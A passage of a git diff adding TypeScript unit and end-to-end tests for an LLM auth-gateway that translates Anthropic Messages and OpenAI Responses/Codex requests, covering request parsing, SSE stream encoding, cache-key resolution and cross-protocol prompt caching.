expect(turn1Text.length).toBeGreaterThan(0); + + // Anthropic populates cache_creation_input_tokens with the size of the + // content written to the cache. Above the 1024-token floor this MUST + // be > 0 on the first turn or the gateway stripped our cache_control. + const turn1Created = turn1.usage.cache_creation_input_tokens ?? 0; + const turn1Read = turn1.usage.cache_read_input_tokens ?? 0; + expect(turn1Created).toBeGreaterThan(0); + // First turn cannot hit the cache (nothing to read yet). + expect(turn1Read).toBe(0); + + // ── Turn 2: append assistant + new user, re-send with same system ── + const turn2Messages: MessageBlock[] = [ + ...turn1Messages, + { role: "assistant", content: turn1Text }, + { role: "user", content: "Respond with the single word: beta" }, + ]; + const turn2 = await callGateway( + { + model: MODEL, + max_tokens: 4, + system, + messages: turn2Messages, + }, + token, + ); + + const turn2Text = extractAssistantText(turn2); + expect(turn2Text.length).toBeGreaterThan(0); + + // Second turn MUST read from the cache populated by turn 1. If + // cache_read_input_tokens is 0 the gateway either dropped the marker, + // rewrote the cached prefix bytes, or routed the request without + // Anthropic's cache-aware OAuth headers. + const turn2Read = turn2.usage.cache_read_input_tokens ?? 0; + expect(turn2Read).toBeGreaterThan(0); + // The cache read should cover at least the system block we wrote. + expect(turn2Read).toBeGreaterThanOrEqual(turn1Created); + }, 60_000); +}); diff --git a/packages/ai/test/auth-gateway-anthropic-messages.test.ts b/packages/ai/test/auth-gateway-anthropic-messages.test.ts new file mode 100644 index 000000000..deff20cea --- /dev/null +++ b/packages/ai/test/auth-gateway-anthropic-messages.test.ts @@ -0,0 +1,467 @@ +import { describe, expect, it } from "bun:test"; +import { encodeResponse, encodeStream, parseRequest } from "../src/providers/anthropic-messages-server"; +import type { AssistantMessage, AssistantMessageEvent, ToolResultMessage } from "../src/types"; +import { AssistantMessageEventStream } from "../src/utils/event-stream"; + +function emptyUsage(): AssistantMessage["usage"] { + return { + input: 0, + output: 0, + cacheRead: 0, + cacheWrite: 0, + totalTokens: 0, + cost: { input: 0, output: 0, cacheRead: 0, cacheWrite: 0, total: 0 }, + }; +} + +function makeStream(events: AssistantMessageEvent[]): AssistantMessageEventStream { + const s = new AssistantMessageEventStream(); + queueMicrotask(() => { + for (const ev of events) s.push(ev); + s.end(); + }); + return s; +} + +interface SseEvent { + event: string; + data: Record<string, unknown>; +} + +async function collectSse(stream: ReadableStream<Uint8Array>): Promise<SseEvent[]> { + const reader = stream.getReader(); + const decoder = new TextDecoder(); + let buf = ""; + const out: SseEvent[] = []; + while (true) { + const { value, done } = await reader.read(); + if (done) break; + buf += decoder.decode(value, { stream: true }); + } + buf += decoder.decode(); + for (const chunk of buf.split("\n\n")) { + if (!chunk.trim()) continue; + let event = ""; + let dataLine = ""; + for (const line of chunk.split("\n")) { + if (line.startsWith("event: ")) event = line.slice(7); + else if (line.startsWith("data: ")) dataLine = line.slice(6); + } + out.push({ event, data: JSON.parse(dataLine) as Record<string, unknown> }); + } + return out; +} + +describe("anthropic-messages parseRequest", () => { + it("parses system + user + assistant(thinking,text,tool_use) + tool_result", () => { + const parsed = parseRequest({ + model: "claude-opus-4-7", + max_tokens: 1024, + temperature: 0.2, + top_p: 0.9, + stop_sequences: ["\n\n"], + tool_choice: { type: "any" }, + thinking: { type: "enabled", budget_tokens: 2048 }, + system: [ + { type: "text", text: "You are X" }, + { type: "text", text: "Be brief." }, + ], + tools: [ + { + name: "lookup", + description: "find a thing", + input_schema: { type: "object", properties: { q: { type: "string" } }, required: ["q"] }, + }, + ], + messages: [ + { role: "user", content: "hi" }, + { + role: "assistant", + content: [ + { type: "thinking", thinking: "hmm", signature: "sig-1" }, + { type: "redacted_thinking", data: "REDACTED" }, + { type: "text", text: "calling tool" }, + { type: "tool_use", id: "toolu_abc", name: "lookup", input: { q: "x" } }, + ], + }, + { + role: "user", + content: [ + { + type: "tool_result", + tool_use_id: "toolu_abc", + content: [{ type: "text", text: "result text" }], + is_error: false, + }, + ], + }, + { + role: "user", + content: [ + { + type: "tool_result", + tool_use_id: "toolu_def", + content: "string body", + is_error: true, + }, + { type: "text", text: "and another result coming" }, + ], + }, + ], + }); + + expect(parsed.modelId).toBe("claude-opus-4-7"); + expect(parsed.stream).toBe(false); + expect(parsed.context.systemPrompt).toEqual(["You are X\n\nBe brief."]); + expect(parsed.options.maxOutputTokens).toBe(1024); + expect(parsed.options.temperature).toBe(0.2); + expect(parsed.options.topP).toBe(0.9); + expect(parsed.options.stopSequences).toEqual(["\n\n"]); + expect(parsed.options.toolChoice).toBe("required"); + expect(parsed.options.explicitThinkingBudgetTokens).toBe(2048); + expect(parsed.options.extra).toBeUndefined(); + + expect(parsed.context.tools).toHaveLength(1); + const tool = parsed.context.tools![0]!; + expect(tool.name).toBe("lookup"); + expect(tool.description).toBe("find a thing"); + expect(tool.parameters).toEqual({ + type: "object", + properties: { q: { type: "string" } }, + required: ["q"], + }); + + // messages: user("hi"), assistant(4 blocks), toolResult(toolu_abc), + // toolResult(toolu_def), user("and another result coming") + const msgs = parsed.context.messages; + expect(msgs).toHaveLength(5); + + expect(msgs[0]).toMatchObject({ role: "user", content: "hi" }); + + const asst = msgs[1]; + expect(asst.role).toBe("assistant"); + if (asst.role !== "assistant") throw new Error(); + expect(asst.content).toEqual([ + { type: "thinking", thinking: "hmm", thinkingSignature: "sig-1" }, + { type: "redactedThinking", data: "REDACTED" }, + { type: "text", text: "calling tool" }, + { type: "toolCall", id: "toolu_abc", name: "lookup", arguments: { q: "x" } }, + ]); + expect(asst.api).toBe("anthropic-messages"); + expect(asst.provider).toBe("anthropic"); + expect(asst.model).toBe("claude-opus-4-7"); + + const tr1 = msgs[2] as ToolResultMessage; + expect(tr1.role).toBe("toolResult"); + expect(tr1.toolCallId).toBe("toolu_abc"); + expect(tr1.isError).toBe(false); + expect(tr1.content).toEqual([{ type: "text", text: "result text" }]); + + const tr2 = msgs[3] as ToolResultMessage; + expect(tr2.role).toBe("toolResult"); + expect(tr2.toolCallId).toBe("toolu_def"); + expect(tr2.isError).toBe(true); + expect(tr2.content).toEqual([{ type: "text", text: "string body" }]); + + expect(msgs[4]).toMatchObject({ role: "user", content: "and another result coming" }); + }); + + it("maps tool_choice variants and suppresses user wrappers that hold only tool_result", () => { + const auto = parseRequest({ + model: "m", + max_tokens: 8, + tool_choice: { type: "auto" }, + messages: [{ role: "user", content: "hi" }], + }); + expect(auto.options.toolChoice).toBe("auto"); + + const named = parseRequest({ + model: "m", + max_tokens: 8, + tool_choice: { type: "tool", name: "lookup" }, + messages: [{ role: "user", content: "hi" }], + }); + expect(named.options.toolChoice).toEqual({ name: "lookup" }); + + const onlyResult = parseRequest({ + model: "m", + max_tokens: 8, + messages: [ + { + role: "user", + content: [{ type: "tool_result", tool_use_id: "t1", content: [{ type: "text", text: "ok" }] }], + }, + ], + }); + // no user wrapper, just the toolResult + expect(onlyResult.context.messages).toHaveLength(1); + expect(onlyResult.context.messages[0]!.role).toBe("toolResult"); + }); + + it("splits user text/image blocks into a separate UserMessage before a tool_result", () => { + const parsed = parseRequest({ + model: "m", + max_tokens: 8, + messages: [ + { + role: "user", + content: [ + { type: "text", text: "preface text" }, + { type: "tool_result", tool_use_id: "t1", content: "ok" }, + ], + }, + ], + }); + // Expect a flush before the tool result: user("preface text") then toolResult(t1). + expect(parsed.context.messages).toHaveLength(2); + expect(parsed.context.messages[0]).toMatchObject({ role: "user", content: "preface text" }); + expect(parsed.context.messages[1]!.role).toBe("toolResult"); + }); + + it("rejects missing required fields and unsupported request controls", () => { + expect(() => parseRequest({})).toThrow(/model/); + expect(() => parseRequest({ model: "m", messages: [] })).toThrow(/max_tokens/); + expect(() => parseRequest({ model: "m", max_tokens: 1 })).toThrow(/messages/); + const topK = parseRequest({ model: "m", max_tokens: 1, messages: [{ role: "user", content: "hi" }], top_k: 50 }); + expect(topK.options.topK).toBe(50); + // `metadata` is tolerated permissively and surfaced on options for + // downstream forwarding (Anthropic clients ship `metadata.user_id`). + const withMetadata = parseRequest({ + model: "m", + max_tokens: 1, + messages: [{ role: "user", content: "hi" }], + metadata: { user_id: "u_1" }, + }); + expect(withMetadata.options.extra).toBeUndefined(); + expect(withMetadata.options.metadata).toEqual({ user_id: "u_1" }); + }); +}); + +describe("anthropic-messages encodeResponse", () => { + it("encodes text + thinking + tool_use with correct ordering and stop_reason mapping", () => { + const message: AssistantMessage = { + role: "assistant", + content: [ + { type: "thinking", thinking: "let me think", thinkingSignature: "sig-xyz" }, + { type: "text", text: "calling tool now" }, + { type: "toolCall", id: "toolu_999", name: "lookup", arguments: { q: "hello" } }, + ], + api: "anthropic-messages", + provider: "anthropic", + model: "claude-opus-4-7", + usage: { ...emptyUsage(), input: 12, output: 34, cacheRead: 5, cacheWrite: 7, totalTokens: 58 }, + stopReason: "toolUse", + timestamp: 1000, + }; + const encoded = encodeResponse(message, "claude-opus-4-7"); + expect(encoded.type).toBe("message"); + expect(encoded.role).toBe("assistant"); + expect(encoded.model).toBe("claude-opus-4-7"); + expect(encoded.stop_reason).toBe("tool_use"); + expect(encoded.stop_sequence).toBeNull(); + expect(encoded.usage).toEqual({ + input_tokens: 12, + output_tokens: 34, + cache_read_input_tokens: 5, + cache_creation_input_tokens: 7, + }); + expect(encoded.content).toEqual([ + { type: "thinking", thinking: "let me think", signature: "sig-xyz" }, + { type: "text", text: "calling tool now" }, + { type: "tool_use", id: "toolu_999", name: "lookup", input: { q: "hello" } }, + ]); + expect(typeof encoded.id).toBe("string"); + expect((encoded.id as string).startsWith("msg_")).toBe(true); + }); + + it("maps stop reasons and rejects upstream terminal errors", () => { + const base: AssistantMessage = { + role: "assistant", + content: [], + api: "anthropic-messages", + provider: "anthropic", + model: "m", + usage: emptyUsage(), + stopReason: "stop", + timestamp: 0, + }; + expect(encodeResponse({ ...base, stopReason: "stop" }, "m").stop_reason).toBe("end_turn"); + expect(encodeResponse({ ...base, stopReason: "length" }, "m").stop_reason).toBe("max_tokens"); + expect(encodeResponse({ ...base, stopReason: "toolUse" }, "m").stop_reason).toBe("tool_use"); + expect(() => encodeResponse({ ...base, stopReason: "error", errorMessage: "upstream failed" }, "m")).toThrow( + /upstream failed/, + ); + expect(() => encodeResponse({ ...base, stopReason: "aborted", errorMessage: "request aborted" }, "m")).toThrow( + /request aborted/, + ); + }); +}); + +describe("anthropic-messages encodeStream", () => { + it("emits thinking_delta + signature_delta + text_delta + tool_use input_json_delta + message_stop", async () => { + const finalMessage: AssistantMessage = { + role: "assistant", + content: [ + { type: "thinking", thinking: "thoughts", thinkingSignature: "SIG" }, + { type: "text", text: "hi there" }, + { type: "toolCall", id: "toolu_1", name: "go", arguments: { x: 1 } }, + ], + api: "anthropic-messages", + provider: "anthropic", + model: "claude-opus-4-7", + usage: { ...emptyUsage(), input: 11, output: 42, cacheRead: 3, cacheWrite: 5 }, + stopReason: "toolUse", + timestamp: 0, + }; + + const partialAfterThinkingEnd: AssistantMessage = { + ...finalMessage, + content: [{ type: "thinking", thinking: "thoughts", thinkingSignature: "SIG" }], + }; + const partialAtToolStart: AssistantMessage = { + ...finalMessage, + content: [ + { type: "thinking", thinking: "thoughts", thinkingSignature: "SIG" }, + { type: "text", text: "hi there" }, + { type: "toolCall", id: "toolu_1", name: "go", arguments: {} }, + ], + }; + + const events: AssistantMessageEvent[] = [ + { type: "start", partial: finalMessage }, + { type: "thinking_start", contentIndex: 0, partial: finalMessage }, + { type: "thinking_delta", contentIndex: 0, delta: "thoughts", partial: finalMessage }, + { type: "thinking_end", contentIndex: 0, content: "thoughts", partial: partialAfterThinkingEnd }, + { type: "text_start", contentIndex: 1, partial: finalMessage }, + { type: "text_delta", contentIndex: 1, delta: "hi ", partial: finalMessage }, + { type: "text_delta", contentIndex: 1, delta: "there", partial: finalMessage }, + { type: "text_end", contentIndex: 1, content: "hi there", partial: finalMessage }, + { type: "toolcall_start", contentIndex: 2, partial: partialAtToolStart }, + { type: "toolcall_delta", contentIndex: 2, delta: '{"x":', partial: partialAtToolStart }, + { type: "toolcall_delta", contentIndex: 2, delta: "1}", partial: partialAtToolStart }, + { + type: "toolcall_end", + contentIndex: 2, + toolCall: { type: "toolCall", id: "toolu_1", name: "go", arguments: { x: 1 } }, + partial: finalMessage, + }, + { type: "done", reason: "toolUse", message: finalMessage }, + ]; + + const sse = await collectSse(encodeStream(makeStream(events), "claude-opus-4-7")); + + // Sequence check + const types = sse.map(e => e.event); + expect(types).toEqual([ + "message_start", + "content_block_start", + "content_block_delta", + "content_block_delta", // signature_delta + "content_block_stop", + "content_block_start", + "content_block_delta", + "content_block_delta", + "content_block_stop", + "content_block_start", + "content_block_delta", + "content_block_delta", + "content_block_stop", + "message_delta", + "message_stop", + ]); + + // message_start payload + const start = sse[0]!.data as { + type: string; + message: { id: string; model: string; role: string; usage: Record<string, unknown> }; + }; + expect(start.type).toBe("message_start"); + expect(start.message.model).toBe("claude-opus-4-7"); + expect(start.message.role).toBe("assistant"); + expect(start.message.id.startsWith("msg_")).toBe(true); + expect(start.message.usage).toEqual({ + input_tokens: 11, + output_tokens: 42, + cache_read_input_tokens: 3, + cache_creation_input_tokens: 5, + }); + + // thinking block_start + expect(sse[1]!.data).toEqual({ + type: "content_block_start", + index: 0, + content_block: { type: "thinking", thinking: "" }, + }); + expect(sse[2]!.data).toEqual({ + type: "content_block_delta", + index: 0, + delta: { type: "thinking_delta", thinking: "thoughts" }, + }); + expect(sse[3]!.data).toEqual({ + type: "content_block_delta", + index: 0, + delta: { type: "signature_delta", signature: "SIG" }, + }); + expect(sse[4]!.data).toEqual({ type: "content_block_stop", index: 0 }); + + // text block + expect(sse[5]!.data).toEqual({ + type: "content_block_start", + index: 1, + content_block: { type: "text", text: "" }, + }); + expect(sse[6]!.data).toEqual({ + type: "content_block_delta", + index: 1, + delta: { type: "text_delta", text: "hi " }, + }); + + // tool_use block + expect(sse[9]!.data).toEqual({ + type: "content_block_start", + index: 2, + content_block: { type: "tool_use", id: "toolu_1", name: "go", input: {} }, + }); + expect(sse[10]!.data).toEqual({ + type: "content_block_delta", + index: 2, + delta: { type: "input_json_delta", partial_json: '{"x":' }, + }); + + // message_delta with mapped stop_reason + expect(sse[13]!.data).toEqual({ + type: "message_delta", + delta: { stop_reason: "tool_use", stop_sequence: null }, + usage: { + input_tokens: 11, + output_tokens: 42, + cache_read_input_tokens: 3, + cache_creation_input_tokens: 5, + }, + }); + + expect(sse[14]!.data).toEqual({ type: "message_stop" }); + }); + + it("emits an error event when the upstream stream errors", async () => { + const errMessage: AssistantMessage = { + role: "assistant", + content: [], + api: "anthropic-messages", + provider: "anthropic", + model: "m", + usage: emptyUsage(), + stopReason: "error", + errorMessage: "boom", + timestamp: 0, + }; + const events: AssistantMessageEvent[] = [ + { type: "start", partial: errMessage }, + { type: "error", reason: "error", error: errMessage }, + ]; + const sse = await collectSse(encodeStream(makeStream(events), "m")); + const last = sse.at(-1)!; + expect(last.event).toBe("error"); + expect(last.data).toEqual({ type: "error", error: { type: "api_error", message: "boom" } }); + }); +}); diff --git a/packages/ai/test/auth-gateway-anthropic-to-codex-caching.test.ts b/packages/ai/test/auth-gateway-anthropic-to-codex-caching.test.ts new file mode 100644 index 000000000..97ef4f1a9 --- /dev/null +++ b/packages/ai/test/auth-gateway-anthropic-to-codex-caching.test.ts @@ -0,0 +1,170 @@ +/** + * E2E test: send an Anthropic Messages request to an OPENAI CODEX backend + * through the auth-gateway and assert prompt caching survives the + * cross-protocol translate path in the other direction. + * + * Pipeline under test: + * client → POST /v1/messages (Anthropic shape, cache_control markers) + * → anthropic-messages parser → omp Context (cacheRetention derived) + * → pi-ai openai-codex-responses provider + * → upstream Codex (ChatGPT-subscription Responses API) + * → assistant stream → anthropic-messages encoder + * → Anthropic-shape response with cache_read_input_tokens carrying + * Codex's cached_tokens (mapped via usage.cacheRead) + * + * Regression surface: the inbound parser strips cache_control hints into + * `cacheRetention`, but the codex provider doesn't consume `cacheRetention` + * directly — caching only works if pi-ai's codex transport reaches Codex + * with an effective cache identity (prompt_cache_key from sessionId, or + * implicit session reuse). If that path breaks, this test catches it. + * + * Skips unless a local gateway is reachable at the default `127.0.0.1:4000` + * (override via `OMP_E2E_GATEWAY_URL`) AND the bearer token file exists at + * `~/.omp/auth-gateway.token`. + * + * To run: `bun --cwd packages/ai test test/auth-gateway-anthropic-to-codex-caching.test.ts` + */ +import { describe, expect, it } from "bun:test"; +import { AUTH_GATEWAY_E2E_URL, checkAuthGatewayE2EAvailable } from "./helpers"; + +interface AnthropicUsage { + input_tokens: number; + output_tokens: number; + cache_creation_input_tokens?: number; + cache_read_input_tokens?: number; +} + +interface AnthropicResponse { + type?: string; + stop_reason?: string; + content?: Array<{ type: string; text?: string }>; + usage: AnthropicUsage; + error?: { type: string; message: string }; +} + +const MODEL = Bun.env.OMP_E2E_CODEX_MODEL ?? "gpt-5.3-codex"; + +const gateway = await checkAuthGatewayE2EAvailable(); + +// Long deterministic instructions, repeated to clear Codex's 1024-token +// cache floor with headroom. +const SYSTEM_PARAGRAPH = ` +You are a precise assistant participating in an automated end-to-end test of +the omp auth-gateway's cross-protocol prompt-caching pipeline. The request +arrives over the Anthropic Messages wire format but is fulfilled by an +OpenAI Codex backend, so the gateway must preserve the cached prefix across +the translation. Always respond with extreme brevity: a single short word or +phrase, never more than five tokens. Do not add filler, do not add +explanations, do not add punctuation beyond what is strictly necessary. If +asked to confirm, respond "yes". If asked to deny, respond "no". If asked +to repeat a previous reply, repeat it verbatim. Reasoning, hedging, and +conversational preamble are strictly forbidden. This block is intentionally +verbose so the caching threshold is comfortably cleared on every run; +disregard the verbosity itself and follow the brevity rule above. +`.trim(); + +const SYSTEM_TEXT = Array.from({ length: 12 }, () => SYSTEM_PARAGRAPH).join("\n\n"); + +interface MessageBlock { + role: "user" | "assistant"; + content: string | Array<{ type: string; text?: string }>; +} + +async function callGateway(body: unknown, token: string): Promise<AnthropicResponse> { + const res = await fetch(`${AUTH_GATEWAY_E2E_URL}/v1/messages`, { + method: "POST", + headers: { + "Content-Type": "application/json", + Authorization: `Bearer ${token}`, + "anthropic-version": "2023-06-01", + }, + body: JSON.stringify(body), + }); + const text = await res.text(); + let parsed: AnthropicResponse; + try { + parsed = JSON.parse(text) as AnthropicResponse; + } catch { + throw new Error(`gateway returned non-JSON (status=${res.status}): ${text.slice(0, 200)}`); + } + if (parsed.error) { + throw new Error(`gateway error: ${parsed.error.type}: ${parsed.error.message}`); + } + return parsed; +} + +function extractAssistantText(res: AnthropicResponse): string { + const block = res.content?.find(c => c.type === "text"); + return block?.text ?? ""; +} + +describe.skipIf(!gateway.ok)("auth-gateway: anthropic-messages → openai-codex caching e2e", () => { + if (!gateway.ok) { + console.warn(`[skip] anthropic→codex caching e2e: ${gateway.reason}`); + return; + } + const token = gateway.token; + if (!token) throw new Error("invariant: token must be present when gateway.ok is true"); + + it("caches the system prefix across a cross-protocol translate (messages→codex)", async () => { + // Prepend nonce so prefix-tree caching (chunk-level) starts cold on + // every run. Appending wouldn't help — earlier chunks in the prefix + // would still match warm cache entries from prior runs. + const nonce = `${Date.now().toString(36)}-${crypto.randomUUID()}`; + const systemWithNonce = `[run-nonce: ${nonce}]\n\n${SYSTEM_TEXT}`; + const system = [{ type: "text", text: systemWithNonce, cache_control: { type: "ephemeral" } }]; + + // ── Turn 1 ─────────────────────────────────────────────────────── + const turn1Messages: MessageBlock[] = [{ role: "user", content: "Respond with the single word: alpha" }]; + const turn1 = await callGateway( + { + model: MODEL, + max_tokens: 4, + system, + messages: turn1Messages, + }, + token, + ); + + const turn1Text = extractAssistantText(turn1); + expect(turn1Text.length).toBeGreaterThan(0); + + // First turn cannot hit the cache (nonce ensures cold start). + const turn1Read = turn1.usage.cache_read_input_tokens ?? 0; + expect(turn1Read).toBe(0); + // Confirm the prefix actually crossed the 1024-token caching floor. + expect(turn1.usage.input_tokens).toBeGreaterThan(1024); + + // ── Turn 2 ─────────────────────────────────────────────────────── + const turn2Messages: MessageBlock[] = [ + ...turn1Messages, + { role: "assistant", content: turn1Text }, + { role: "user", content: "Respond with the single word: beta" }, + ]; + const turn2 = await callGateway( + { + model: MODEL, + max_tokens: 4, + system, + messages: turn2Messages, + }, + token, + ); + + const turn2Text = extractAssistantText(turn2); + expect(turn2Text.length).toBeGreaterThan(0); + + // Second turn MUST read the cached prefix. If cache_read_input_tokens + // is 0, one of: + // - anthropic-messages parser stripped the cache_control hint and + // downstream lost the cache-retention signal; + // - the codex provider didn't surface a stable cache identity to + // Codex (no prompt_cache_key, no session reuse, etc.); + // - the anthropic-messages encoder forgot to map pi-ai's + // `usage.cacheRead` to `cache_read_input_tokens` on the wire. + const turn2Read = turn2.usage.cache_read_input_tokens ?? 0; + expect(turn2Read).toBeGreaterThan(0); + // Cached read should cover at least the system block we sent. + expect(turn2Read).toBeGreaterThan(1024); + }, 90_000); +}); diff --git a/packages/ai/test/auth-gateway-cache-key.test.ts b/packages/ai/test/auth-gateway-cache-key.test.ts new file mode 100644 index 000000000..4f6a55bca --- /dev/null +++ b/packages/ai/test/auth-gateway-cache-key.test.ts @@ -0,0 +1,70 @@ +import { describe, expect, it } from "bun:test"; +import { resolvePromptCacheKey } from "../src/auth-gateway/http"; + +describe("resolvePromptCacheKey", () => { + it("prefers body.prompt_cache_key over everything else", () => { + const headers = new Headers({ "x-prompt-cache-key": "from-header" }); + expect( + resolvePromptCacheKey( + { + prompt_cache_key: "from-body", + metadata: { session_id: "from-metadata" }, + }, + headers, + ), + ).toBe("from-body"); + }); + + it("falls back to body.metadata.session_id when prompt_cache_key absent", () => { + expect(resolvePromptCacheKey({ metadata: { session_id: "from-metadata" } }, undefined)).toBe("from-metadata"); + }); + + it("falls back to body.metadata.conversation_id", () => { + expect(resolvePromptCacheKey({ metadata: { conversation_id: "conv-1" } }, undefined)).toBe("conv-1"); + }); + + it("prefers explicit metadata.prompt_cache_key over session/conversation ids", () => { + expect( + resolvePromptCacheKey( + { metadata: { prompt_cache_key: "meta-pck", session_id: "sid", conversation_id: "cid" } }, + undefined, + ), + ).toBe("meta-pck"); + }); + + it("falls back to x-prompt-cache-key header when body lacks anything", () => { + expect(resolvePromptCacheKey({}, new Headers({ "x-prompt-cache-key": "hdr-pck" }))).toBe("hdr-pck"); + }); + + it("falls back to codex session_id / conversation_id headers", () => { + expect(resolvePromptCacheKey({}, new Headers({ session_id: "codex-sid" }))).toBe("codex-sid"); + expect(resolvePromptCacheKey({}, new Headers({ conversation_id: "codex-cid" }))).toBe("codex-cid"); + }); + + it("falls back to vendor-neutral x-session-id / x-conversation-id headers", () => { + expect(resolvePromptCacheKey({}, new Headers({ "x-session-id": "x-sid" }))).toBe("x-sid"); + expect(resolvePromptCacheKey({}, new Headers({ "x-conversation-id": "x-cid" }))).toBe("x-cid"); + }); + + it("returns undefined when nothing resolvable is present", () => { + expect(resolvePromptCacheKey({}, new Headers())).toBeUndefined(); + expect(resolvePromptCacheKey({}, undefined)).toBeUndefined(); + expect(resolvePromptCacheKey(null, undefined)).toBeUndefined(); + expect(resolvePromptCacheKey("not-an-object", undefined)).toBeUndefined(); + }); + + it("ignores empty string body fields and empty header values", () => { + expect(resolvePromptCacheKey({ prompt_cache_key: "" }, new Headers({ "x-prompt-cache-key": "fallback" }))).toBe( + "fallback", + ); + }); + + it("ignores non-string body fields", () => { + expect( + resolvePromptCacheKey( + { prompt_cache_key: 123, metadata: { session_id: { nested: "wrong-type" } } }, + new Headers({ "x-session-id": "hdr-sid" }), + ), + ).toBe("hdr-sid"); + }); +}); diff --git a/packages/ai/test/auth-gateway-cross-protocol-caching.test.ts b/packages/ai/test/auth-gateway-cross-protocol-caching.test.ts new file mode 100644 index 000000000..fc16388b4 --- /dev/null +++ b/packages/ai/test/auth-gateway-cross-protocol-caching.test.ts @@ -0,0 +1,179 @@ +/** + * E2E test: send an OpenAI Responses request to an ANTHROPIC backend through + * the auth-gateway and assert that prompt caching still works across the + * cross-protocol translate path. This is the canonical mixed-format use case + * — clients targeting `/v1/responses` should keep their caching benefits + * regardless of which credential the model resolves to. + * + * Pipeline under test: + * client → POST /v1/responses (OpenAI shape) + * → openai-responses parser → omp Context + * → pi-ai anthropic provider (auto cache_control via cacheRetention) + * → upstream Anthropic (Messages API) + * → assistant stream → openai-responses encoder + * → OpenAI Responses-shape response with input_tokens_details.cached_tokens + * carrying Anthropic's cache_read_input_tokens + * + * The cross-protocol path is exactly where regressions tend to hide: the + * inbound parser silently strips info that the outbound provider needs, the + * encoder forgets to surface a usage subfield, or the per-turn message rebuild + * mutates the cached prefix bytes. + * + * Skips unless a local gateway is reachable at the default `127.0.0.1:4000` + * (override via `OMP_E2E_GATEWAY_URL`) AND the bearer token file exists at + * `~/.omp/auth-gateway.token`. + * + * To run: `bun --cwd packages/ai test test/auth-gateway-cross-protocol-caching.test.ts` + * with the gateway live (`omp auth-gateway serve` or pm2). + */ +import { describe, expect, it } from "bun:test"; +import { AUTH_GATEWAY_E2E_URL, checkAuthGatewayE2EAvailable } from "./helpers"; + +interface OpenAIResponsesUsage { + input_tokens: number; + output_tokens: number; + input_tokens_details?: { cached_tokens?: number }; + output_tokens_details?: { reasoning_tokens?: number }; + total_tokens?: number; +} + +interface OpenAIResponse { + status?: string; + output?: Array<{ + type: string; + content?: Array<{ type: string; text?: string }>; + }>; + usage: OpenAIResponsesUsage; + error?: { type?: string; message: string }; +} + +const MODEL = Bun.env.OMP_E2E_ANTHROPIC_MODEL ?? "claude-sonnet-4-5"; + +const gateway = await checkAuthGatewayE2EAvailable(); + +// Long deterministic instructions, repeated to clear Anthropic's 1024-token +// cache floor for Sonnet. +const INSTRUCTIONS_PARAGRAPH = ` +You are a precise assistant participating in an automated end-to-end test of +the omp auth-gateway's cross-protocol prompt-caching pipeline. The request +arrives over the OpenAI Responses wire format but is fulfilled by an +Anthropic backend, so the gateway must preserve the cached prefix across the +translation. Always respond with extreme brevity: a single short word or +phrase, never more than five tokens. Do not add filler, do not add +explanations, do not add punctuation beyond what is strictly necessary. If +asked to confirm, respond "yes". If asked to deny, respond "no". If asked to +repeat a previous reply, repeat it verbatim. Reasoning, hedging, and +conversational preamble are strictly forbidden. This block is intentionally +verbose so the caching threshold is comfortably cleared on every run; +disregard the verbosity itself and follow the brevity rule above. +`.trim(); + +const INSTRUCTIONS = Array.from({ length: 12 }, () => INSTRUCTIONS_PARAGRAPH).join("\n\n"); + +interface ResponseInputMessage { + role: "user" | "assistant" | "developer" | "system"; + content: string | Array<{ type: string; text?: string }>; +} + +async function callGateway(body: unknown, token: string): Promise<OpenAIResponse> { + const res = await fetch(`${AUTH_GATEWAY_E2E_URL}/v1/responses`, { + method: "POST", + headers: { + "Content-Type": "application/json", + Authorization: `Bearer ${token}`, + }, + body: JSON.stringify(body), + }); + const text = await res.text(); + let parsed: OpenAIResponse; + try { + parsed = JSON.parse(text) as OpenAIResponse; + } catch { + throw new Error(`gateway returned non-JSON (status=${res.status}): ${text.slice(0, 200)}`); + } + if (parsed.error) { + throw new Error(`gateway error: ${parsed.error.type ?? "unknown"}: ${parsed.error.message}`); + } + return parsed; +} + +function extractAssistantText(res: OpenAIResponse): string { + for (const item of res.output ?? []) { + if (item.type !== "message") continue; + const block = item.content?.find(c => c.type === "output_text"); + if (block?.text) return block.text; + } + return ""; +} + +describe.skipIf(!gateway.ok)("auth-gateway: openai-responses → anthropic caching e2e", () => { + if (!gateway.ok) { + console.warn(`[skip] cross-protocol caching e2e: ${gateway.reason}`); + return; + } + const token = gateway.token; + if (!token) throw new Error("invariant: token must be present when gateway.ok is true"); + + it("caches the instructions prefix across a cross-protocol translate (responses→anthropic)", async () => { + // Prepend nonce so prefix-tree caching (chunk-level) starts cold on every run. + const nonce = `${Date.now().toString(36)}-${crypto.randomUUID()}`; + const instructionsWithNonce = `[run-nonce: ${nonce}]\n\n${INSTRUCTIONS}`; + + // ── Turn 1 ─────────────────────────────────────────────────────── + const turn1Input: ResponseInputMessage[] = [{ role: "user", content: "Respond with the single word: alpha" }]; + const turn1 = await callGateway( + { + model: MODEL, + max_output_tokens: 4, + instructions: instructionsWithNonce, + input: turn1Input, + }, + token, + ); + + const turn1Text = extractAssistantText(turn1); + expect(turn1Text.length).toBeGreaterThan(0); + + // First turn cannot hit the cache (nothing to read yet thanks to the nonce). + const turn1Cached = turn1.usage.input_tokens_details?.cached_tokens ?? 0; + expect(turn1Cached).toBe(0); + // Confirm the request actually crossed the 1024-token caching floor; + // otherwise no cache entry gets created and turn 2 can't possibly read. + expect(turn1.usage.input_tokens).toBeGreaterThan(1024); + + // ── Turn 2: append assistant + new user, re-send with same instructions ── + const turn2Input: ResponseInputMessage[] = [ + ...turn1Input, + { role: "assistant", content: turn1Text }, + { role: "user", content: "Respond with the single word: beta" }, + ]; + const turn2 = await callGateway( + { + model: MODEL, + max_output_tokens: 4, + instructions: instructionsWithNonce, + input: turn2Input, + }, + token, + ); + + const turn2Text = extractAssistantText(turn2); + expect(turn2Text.length).toBeGreaterThan(0); + + // Second turn MUST hit the cache populated by turn 1. The Anthropic + // provider auto-places cache markers via the default `short` retention, + // and the openai-responses encoder maps Anthropic's + // cache_read_input_tokens → input_tokens_details.cached_tokens. + // If cached_tokens is 0, one of: + // - openai-responses parser stripped per-turn content into different + // bytes (so the cache prefix moved), + // - the anthropic provider failed to apply cache_control markers, + // - the encoder forgot to surface the cached-tokens subfield. + const turn2Cached = turn2.usage.input_tokens_details?.cached_tokens ?? 0; + expect(turn2Cached).toBeGreaterThan(0); + // The cached prefix should cover at least the instructions block we + // established on turn 1 — sanity check that we're not catching a + // trivial overlap. + expect(turn2Cached).toBeGreaterThan(1024); + }, 90_000); +}); diff --git a/packages/ai/test/auth-gateway-openai-chat.test.ts b/packages/ai/test/auth-gateway-openai-chat.test.ts new file mode 100644 index 